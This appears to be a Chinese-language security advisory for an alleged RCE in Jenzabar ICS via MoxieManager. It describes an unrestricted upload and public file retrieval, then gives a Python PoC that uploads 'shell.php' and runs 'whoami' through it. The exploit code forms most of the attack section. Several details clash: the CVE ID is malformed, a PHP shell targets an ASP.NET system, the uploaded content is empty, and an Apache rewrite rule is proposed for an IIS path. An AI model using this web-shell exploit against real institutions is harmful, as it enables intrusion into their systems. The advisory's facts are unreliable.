
CVE-2026-30-03 9.8(严重)Jenzabar ICS + MoxieManager 可能存在 RCE
CVE-2026-30-03 9.8(严重)Jenzabar ICS + MoxieManager 可能存在 RCE
proff https://www.youtube.com/watch?v=lcfUL6Xx3f4&feature=youtu.be
CVE CVSS 影响 受影响组件 CVE-2026-30-03 9.8(严重) 可能存在 RCE Jenzabar ICS + MoxieManager
Jenzabar ICS 系统所使用的 MoxieManager 组件中存在一个漏洞,可能导致文件上传不当,在特定条件下这些文件可被公开访问,并可能进一步导致远程代码执行(RCE)。 技术描述
该问题由以下原因导致:
上传文件缺乏充分的验证
文件可能通过公开端点暴露:
/ICS/staticpages/getfile.aspx
端点认证控制不一致:
/ICS/UI/Common/Scripts/tinymce/plugins/moxiemanager/api.ashx
在特定场景下,上传的文件可能被存储在可访问的目录中,随后可被检索。
影响 任意文件上传 敏感内容暴露 可能的远程代码执行(取决于服务器配置) 系统完全受损
分类 CVSS v3.1:9.8(严重) 向量: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE-434:无限制文件上传 CWE-284:访问控制不当
PoC 漏洞利用代码
#!/usr/bin/env python3
import requests
TARGET = "https://example.edu" MOXIE = f"{TARGET}/ICS/UI/Common/Scripts/tinymce/plugins/moxiemanager/api.ashx" UUID = "5d6b24cb-7bfe-4a6b-8581-4426bf0f4101"
files = {'file': ('shell.php', '', 'application/x-php')} data = {'action': 'upload', 'path': '/1085255', 'csrf': 'E24607903E4DC7496732F267BAD48FF35D855DA9E362AB80E0340D5B5EC5F164'}
r = requests.post(MOXIE, files=files, data=data) print(f"[+] Upload: {r.status_code}")
SHELL = f"{TARGET}/ICS/staticpages/getfile.aspx?target=/moxiemanager/files/users/{UUID}/shell.php" print(f"[+] Shell: {SHELL}?cmd=whoami") print(requests.get(f"{SHELL}?cmd=whoami").text)
受影响系统(已确认 33+ 个)
修复方案 立即处理(缓解措施):
删除 /moxiemanager/files/users/*/shell.php
限制 getfile.aspx:
RewriteRule ^/ICS/staticpages/getfile.aspx?target=.*shell.php - [F,L]
禁用 MoxieManager 上传功能